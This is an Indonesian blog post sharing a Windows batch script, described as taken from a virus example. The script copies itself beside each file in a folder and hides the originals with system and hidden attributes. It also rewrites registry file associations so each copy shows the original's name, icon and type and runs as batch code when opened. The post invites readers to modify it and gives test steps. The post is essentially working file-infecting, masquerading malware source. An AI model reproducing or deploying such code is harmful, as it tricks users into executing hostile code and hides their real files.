Karena masih coba-coba apa aja jadi ada.... juga jarang ada berita, semua lama.....

Mengganti icon dengan file yang diinfeksi

Tidak ada komentar
Ini gue ambil dari contoh virus.... agak ribet musti daftarin file baru ke registry
padahal kalo menurut algoritma gue, sintaknya bisa lebih dipermudah! intinya ada
di perintah "assoc", silahkan di modif :

@echo off
setlocal ENABLEDELAYEDEXPANSION

::Mulai menginfeksi
:Start_Infect
for %%a in ("C:\Test\*.*") do (
set "ext=%%~xa"
set "for_check_ext=!ext:~-3!"
IF /i not "!for_check_ext!"=="vir" (
call :Find_Type
copy /y %0 "%%~dpna!ext!vir" && attrib +s +h "%%~fa"
)
)
GOTO :NEXT

::Cek jika ekstensi sudah ada
:Find_Type
REG Query "HKCR\!ext!vir" >nul 2>&1 && GOTO :EOF
for /f "tokens=1* delims==" %%a in ('assoc !ext!') do (
set "file_type=%%~b"
)
for /f "tokens=1* delims==" %%a in ('assoc !file_type!') do (
set "new_type=%%~b"
)
for /f "tokens=3*" %%a in ('REG QUERY "HKCR\!file_type!\DefaultIcon" ^| find /i "REG_SZ"') do (
set "icon_location=%%~b"
)

::Membuat ekstensi baru
:Create
(
ASSOC !ext!vir=vir!ext!
ASSOC vir!ext!=!new_type!
REG ADD "HKCR\vir!ext!"
REG ADD "HKCR\vir!ext!\DefaultIcon"
REG ADD "HKCR\vir!ext!\DefaultIcon" /ve /d "!icon_location!"
REG ADD "HKCR\vir!ext!\Shell"
REG ADD "HKCR\vir!ext!\Shell\Open"
REG ADD "HKCR\vir!ext!\Shell\Open\Command"
REG ADD "HKCR\vir!ext!\Shell\Open\Command" /ve /d "cmd /c type \"%%1\">\"%TEMP%\temp.bat\" && call \"%TEMP%\temp.bat\" && del /f /q \"%TEMP%\temp.bat\""
) >nul 2>&1
GOTO :EOF
:NEXT

::untuk percobaannya coba buat folder : "C:\Test"
::Terus, dalam folder tersebut isi file bermacam macam (*.doc, *.rar, *.mp3, dll)
::lalu jalankan codenya... kode ini ya!!!
::Liat file yang ada di dalam folder "Test" tsb, yang keliatan adalah virus dan file aslinya di
::superhidden..
::yang lebih mantapnya lagi nama,icon & type filenya sama persis.., sangat sulit dibedakan..
::di coba ye, gue ndiri butuh berkali-kali coba sebelum berhasil!
::Salam BENNY KIRANA
PAUSE

Tidak ada komentar :

Posting Komentar